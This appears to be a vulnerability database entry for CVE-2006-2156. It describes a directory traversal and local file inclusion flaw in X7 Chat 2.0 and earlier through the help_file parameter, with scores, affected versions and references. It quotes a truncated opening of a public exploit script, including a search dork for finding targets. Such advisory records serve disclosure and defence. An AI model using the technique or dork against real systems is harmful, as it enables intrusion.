Published: 03/05/2006 Updated: 18/10/2018

CVSS v2 Base Score: 6.4 | Impact Score: 4.9 | Exploitability Score: 10

VMScore: 645

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:N

Directory traversal vulnerability in help/index.php in X7 Chat 2.0 and previous versions allows remote malicious users to include arbitrary files via .. (dot dot) sequences in the help_file parameter.

Vulnerable Product	Search on Vulmon	Subscribe to Product
x7 group x7 chat 1.3.2b
x7 group x7 chat 1.3.3b
x7 group x7 chat 1.3.4b
x7 group x7 chat 1.3.5b
x7 group x7 chat 1.3.6
x7 group x7 chat 2.0

#!/usr/bin/php -q -d short_open_tag=on <? echo "X7 Chat <=20 \"help_file\" arbitrary local inclusion\r\n"; echo "by rgod rgod@autisticiorg\r\n"; echo "site: retrogodaltervistaorg\r\n"; echo "-> works regardless of magic_quotes_gpc settings\r\n"; echo " if avatar uploads are enabled (default)\r\n"; echo "dork: intitle:\"X7 Chat ...

NVD-CWE-Other http://www.securityfocus.com/bid/17777 http://secunia.com/advisories/19886 http://www.osvdb.org/25149 http://securityreason.com/securityalert/829 http://www.vupen.com/english/advisories/2006/1608 https://exchange.xforce.ibmcloud.com/vulnerabilities/26218 https://www.exploit-db.com/exploits/1738 http://www.securityfocus.com/archive/1/432716/100/0/threaded https://nvd.nist.gov https://www.exploit-db.com/exploits/1738/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2006-2156

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect